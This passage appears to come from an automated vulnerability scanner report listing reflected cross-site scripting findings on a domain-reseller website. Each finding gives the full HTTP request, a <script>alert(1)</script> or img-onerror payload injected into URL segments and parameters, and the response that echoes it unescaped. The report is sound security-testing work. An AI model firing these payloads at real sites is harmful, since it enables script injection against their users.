<p>The requested URL /web-service/domain-names/googlepr.php?41f08<script>alert(1)</script>5f47ac5054=1 was not found on this server.</p>
...[SNIP]...

2.4968. http://www.resellerbase.com/web-service/domain-names/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3d2de<script>alert(1)</script>66664acc750 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service3d2de<script>alert(1)</script>66664acc750/domain-names/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service3d2de<script>alert(1)</script>66664acc750/domain-names/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4969. http://www.resellerbase.com/web-service/domain-names/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a9412<script>alert(1)</script>8e6ecf99827 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-namesa9412<script>alert(1)</script>8e6ecf99827/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-namesa9412<script>alert(1)</script>8e6ecf99827/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4970. http://www.resellerbase.com/web-service/domain-names/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8f47a<script>alert(1)</script>aacd57cfc80 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/search.php8f47a<script>alert(1)</script>aacd57cfc80?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/search.php8f47a<script>alert(1)</script>aacd57cfc80?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4971. http://www.resellerbase.com/web-service/domain-names/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload dc8aa<a>a762a0965bc was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/search.php?keyword=search...&Submit3=Searchdc8aa<a>a762a0965bc&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/search.php?keyword=search...&Submit3=Searchdc8aa<a>a762a0965bc&opt=2 was not found on this server.</p>
...[SNIP]...

2.4972. http://www.resellerbase.com/web-service/domain-names/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17df1"><img%20src%3da%20onerror%3dalert(1)>1e382ea9088 was submitted in the cat parameter. This input was echoed as 17df1\"><img src=a onerror=alert(1)>1e382ea9088 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /web-service/domain-names/search.php?cat=117df1"><img%20src%3da%20onerror%3dalert(1)>1e382ea9088&keyword=search...&Submit3=Search&opt=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:46:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=117df1\"><img src=a onerror=alert(1)>1e382ea9088">
...[SNIP]...

2.4973. http://www.resellerbase.com/web-service/domain-names/search.php [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/search.php

Issue detail

The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8940a"><img%20src%3da%20onerror%3dalert(1)>200aed4e09e9f942a was submitted in the cat parameter. This input was echoed as 8940a\"><img src=a onerror=alert(1)>200aed4e09e9f942a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /web-service/domain-names/search.php?cat=18940a"><img%20src%3da%20onerror%3dalert(1)>200aed4e09e9f942a&keyword=search...&Submit3=Search&opt=1&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/search.php?cat=1&keyword=search...&Submit3=Search&opt=1
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:46:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 15039

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by categories
...[SNIP]...
<a href="http://www.resellerbase.com/add.php?cat=18940a\"><img src=a onerror=alert(1)>200aed4e09e9f942a">
...[SNIP]...

2.4974. http://www.resellerbase.com/web-service/domain-names/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ea27b<a>22beed701c8 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/search.php?keyword=search...ea27b<a>22beed701c8&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/search.php?keyword=search...ea27b<a>22beed701c8&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4975. http://www.resellerbase.com/web-service/domain-names/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c9ff6<script>alert(1)</script>6b894a2004d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/search.php?keyword=search...&Submit3=Search&opt=2&c9ff6<script>alert(1)</script>6b894a2004d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/search.php?keyword=search...&Submit3=Search&opt=2&c9ff6<script>alert(1)</script>6b894a2004d=1 was not found on this server.</p>
...[SNIP]...

2.4976. http://www.resellerbase.com/web-service/domain-names/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload e178b<a>a87bfa1877c was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/domain-names/search.php?keyword=search...&Submit3=Search&opt=2e178b<a>a87bfa1877c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/domain-names/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/search.php?keyword=search...&Submit3=Search&opt=2e178b<a>a87bfa1877c was not found on this server.</p>
...[SNIP]...

2.4977. http://www.resellerbase.com/web-service/domain-names/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eeee0<script>alert(1)</script>3df1dc72a74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviceeeee0<script>alert(1)</script>3df1dc72a74/domain-names/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceeeee0<script>alert(1)</script>3df1dc72a74/domain-names/themes/ was not found on this server.</p>
...[SNIP]...

2.4978. http://www.resellerbase.com/web-service/domain-names/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cdbd9<script>alert(1)</script>084ab662bb9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-namescdbd9<script>alert(1)</script>084ab662bb9/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-namescdbd9<script>alert(1)</script>084ab662bb9/themes/ was not found on this server.</p>
...[SNIP]...

2.4979. http://www.resellerbase.com/web-service/domain-names/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c6a5a<script>alert(1)</script>422cc67544 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themesc6a5a<script>alert(1)</script>422cc67544/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themesc6a5a<script>alert(1)</script>422cc67544/ was not found on this server.</p>
...[SNIP]...

2.4980. http://www.resellerbase.com/web-service/domain-names/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3b407<script>alert(1)</script>3389a6f984c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/?3b407<script>alert(1)</script>3389a6f984c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/?3b407<script>alert(1)</script>3389a6f984c=1 was not found on this server.</p>
...[SNIP]...

2.4981. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 64ac2<script>alert(1)</script>215a7dd0695 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service64ac2<script>alert(1)</script>215a7dd0695/domain-names/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service64ac2<script>alert(1)</script>215a7dd0695/domain-names/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.4982. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1a029<script>alert(1)</script>d64433776cf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names1a029<script>alert(1)</script>d64433776cf/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names1a029<script>alert(1)</script>d64433776cf/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.4983. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 89d57<script>alert(1)</script>a8bb4890495 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes89d57<script>alert(1)</script>a8bb4890495/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes89d57<script>alert(1)</script>a8bb4890495/kosmos/ was not found on this server.</p>
...[SNIP]...

2.4984. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f348e<script>alert(1)</script>8d375614a1f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmosf348e<script>alert(1)</script>8d375614a1f/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmosf348e<script>alert(1)</script>8d375614a1f/ was not found on this server.</p>
...[SNIP]...

2.4985. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bbb84<script>alert(1)</script>c5a14f7bf1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/domain-names/themes/kosmos/?bbb84<script>alert(1)</script>c5a14f7bf1b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/domain-names/themes/kosmos/?bbb84<script>alert(1)</script>c5a14f7bf1b=1 was not found on this server.</p>
...[SNIP]...

2.4986. http://www.resellerbase.com/web-service/domain-names/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/domain-names/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8873a<script>alert(1)</script>4fb9acd74a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

